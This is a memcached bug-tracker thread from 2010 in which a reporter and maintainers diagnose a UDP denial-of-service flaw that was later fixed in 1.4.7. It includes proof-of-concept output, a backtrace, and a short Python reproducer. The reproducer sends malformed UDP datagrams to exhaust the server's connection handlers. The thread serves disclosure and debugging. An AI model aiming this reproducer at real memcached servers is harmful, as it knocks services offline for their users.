I omitted to mention that once the UDP channel stops responding, the memcached
process consumes 100% CPU; in this way the bug indirectly affects users of the
TCP channel, as well as other processes on the same machine.
Original comment by marcolsl...@gmail.com
on 6 Oct 2010 at 9:50
Original comment by eric.d.l...@gmail.com
on 6 Oct 2010 at 5:28
Just FYI, was not able to reproduce this on mac using 1.4.5 with libevent
2.0.7-rc ... will take a look on linux when I get a chance.
smacky:Downloads elambert$ python ./largeudp.py a localhost 11211 1200
[-] Using ascii protocol. Good choice!
[-] Creating socket
[-] Is memcached responding? Yes
[-] Great, server responds
[-] Sending large packet with size 1208
[-] Timeout expired waiting for response to large packet
[-] Is memcached responding? Yes
[E] DoS appears to have failed
smacky:Downloads elambert$ echo "stats" | nc localhost 11211 | egrep
"version|libevent"
STAT version 1.4.5_1_gb4936c4
STAT libevent 2.0.7-rc
smacky:Downloads elambert$ uname -a
Darwin smacky.local 10.4.0 Darwin Kernel Version 10.4.0: Fri Apr 23 18:28:53
PDT 2010; root:xnu-1504.7.4~1/RELEASE_I386 i386 i386
smacky:Downloads elambert$
Original comment by eric.d.l...@gmail.com
on 7 Oct 2010 at 8:58
Thanks for the feedback, and apologies for supplying a PoC that didn't demo the
issue sufficiently; that was a pretty poor showing for a PoC. However, I believe
the bug is still present, as I'll show below. I'm less sure as to the cause:
large packet sizes trigger the bug sooner, but a packet size of 10 also
triggers the bug on my side, eventually.
I can trigger the bug on Snow Leopard (Darwin insurrection.local 10.4.0 Darwin
Kernel Version 10.4.0: Fri Apr 23 18:28:53 PDT 2010;
root:xnu-1504.7.4~1/RELEASE_I386 i386) by running the PoC four times (works for
both ascii and binary protocols) using a packet size of 1200. The same holds
on Linux: repeating the PoC four times triggers the bug.
Below is an OSX backtrace after the bug had been triggered, and memcached was
consuming full CPU:
(gdb) bt
#0 0x00007fff85ab508a in kevent ()
#1 0x00000001000300e3 in kq_dispatch ()
#2 0x000000010002380e in event_base_loop ()
#3 0x0000000100002be7 in main (argc=3, argv=0x7fff5fbff9b0) at memcached.c:4681
(Note: the OS X build used libevent 1.4.2; the latest libevent was used on Linux.)
Not much to go on, I'm afraid.
It may also help to mention that if "-v -v" is enabled, then once the bug is
triggered, no further debug messages are printed to the console for UDP
traffic. TCP traffic still generates the regular debug notices.
Original comment by marcolsl...@gmail.com
on 7 Oct 2010 at 11:08
I think I have somewhat of an idea as to what is happening. UDP connections
behave a little differently from TCP. At startup, the server creates a UDP
"connection handler" for each thread in the server (as controlled by the -t
option). By default there are 4 threads, so there will be 4 UDP "connection
handlers".
What appears to be happening is that the message you are sending is not a
valid/well-formed message, which causes the server to close the "connection
handler" in such a way that it cannot be used again. So in a default scenario
with the server running 4 threads, the first run of your test closes one
connection handler, leaving three; the second run closes a second handler,
leaving two; and so on. If you start the server with only one thread (-t 1)
you should hit the issue on the first run.
I don't have a root cause yet, but the issue does appear to be related to how
the server cleans up the connection handler when it encounters a problem. Will
let you know when I've figured this out.
Original comment by eric.d.l...@gmail.com
on 8 Oct 2010 at 4:48
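The handler-exhaustion theory above can be sketched as a minimal reproducer. This is not the original largeudp.py; host, port, packet size, and function names are assumptions. The 8-byte UDP frame header (request ID, sequence number, total datagrams, reserved, all 16-bit network order) is from memcached's protocol documentation.

```python
import socket
import struct

def udp_frame(request_id, seq, total, payload):
    """Prepend memcached's 8-byte UDP frame header: request id, sequence
    number, total datagrams, reserved (each uint16, network byte order)."""
    return struct.pack("!HHHH", request_id, seq, total, 0) + payload

def probe(sock, addr):
    """Send a well-formed 'version' command; True if the server answers."""
    sock.sendto(udp_frame(1, 0, 1, b"version\r\n"), addr)
    try:
        sock.recvfrom(1400)
        return True
    except socket.timeout:
        return False

def exhaust_handlers(addr=("localhost", 11211), threads=4, size=1200):
    """Each malformed (unterminated) datagram closes one per-thread UDP
    connection handler; after `threads` runs the UDP channel stops responding."""
    sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    sock.settimeout(2.0)
    for run in range(threads):
        sock.sendto(udp_frame(run + 2, 0, 1, b"A" * size), addr)  # no trailing \r\n
        print(f"run {run + 1}: server responding: {probe(sock, addr)}")

if __name__ == "__main__":
    exhaust_handlers()
```

With the diagnosis above, starting the server with -t 1 should make the first iteration of the loop kill the UDP channel.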
Original comment by eric.d.l...@gmail.com
on 8 Oct 2010 at 4:49
Well spotted, I was indeed running the initial tests with -t 1. At least that
clears up some minor confusion on this side.
Original comment by marcolsl...@gmail.com
on 8 Oct 2010 at 9:26
Possibly the same cause as:
http://code.google.com/p/memcached/issues/detail?id=106
Original comment by airat.ha...@gmail.com
on 13 Dec 2010 at 10:53
If you end the message with "\r\n", you won't be able to reproduce the bug.
Original comment by airat.ha...@gmail.com
on 14 Dec 2010 at 3:19
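That observation fits the handler-exhaustion diagnosis: the ASCII protocol expects each command to be terminated with CRLF, and the unterminated datagram appears to be what sends the connection handler down the broken cleanup path. A minimal sketch (the helper name `terminate` is hypothetical):

```python
def terminate(cmd: bytes) -> bytes:
    """Append the CRLF terminator the ASCII protocol expects, if it is
    missing, so the datagram payload parses as a complete command."""
    return cmd if cmd.endswith(b"\r\n") else cmd + b"\r\n"

print(terminate(b"stats"))      # b"stats\r\n" - well-formed payload
print(terminate(b"stats\r\n"))  # already terminated; unchanged
```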
The patch for 1.4.7 related to #106 fixes this one too.
Going to close out this bug and leave any further discussion on the earlier
issue.
Original comment by dorma...@rydia.net
on 8 Aug 2011 at 5:46
Original issue reported on code.google.com by
marcolsl...@gmail.com
on 5 Oct 2010 at 10:02